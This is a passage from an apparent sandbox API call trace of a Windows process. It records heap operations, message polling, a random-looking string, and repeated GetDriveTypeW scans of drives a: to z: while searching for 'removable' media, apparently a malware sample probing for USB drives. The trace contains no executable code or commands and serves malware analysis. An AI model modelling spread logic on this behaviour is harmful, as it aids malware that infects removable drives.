wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.314] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.314] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.314] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.314] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.314] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.314] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.315] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.315] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.315] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.315] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.315] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.316] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.316] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.316] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.316] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.316] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.317] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.317] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.317] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.317] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.317] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.317] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.318] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.318] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.318] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.318] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.318] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.319] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.319] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.332] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.332] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0214.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.333] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0214.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0214.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0214.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0214.333] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0214.334] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.334] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.334] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0214.334] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0214.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.335] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0214.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.335] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.335] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.336] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.336] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.336] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.336] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.336] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.336] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.336] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.337] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.337] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.337] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.337] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.337] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.338] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.338] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.338] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.338] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.338] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.338] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.339] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.339] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.339] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.339] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.340] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.340] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.340] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0214.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0214.342] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0214.342] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.342] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.342] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.342] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0214.343] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.343] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.343] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.344] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.344] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.344] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.344] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.344] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.344] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.345] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.345] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.345] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.345] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.346] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.346] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.346] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.346] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.346] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.346] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.347] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.347] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.347] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.347] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.347] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.348] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.348] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.348] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.348] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0214.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.349] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0214.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.349] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0214.349] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0214.349] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.350] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, 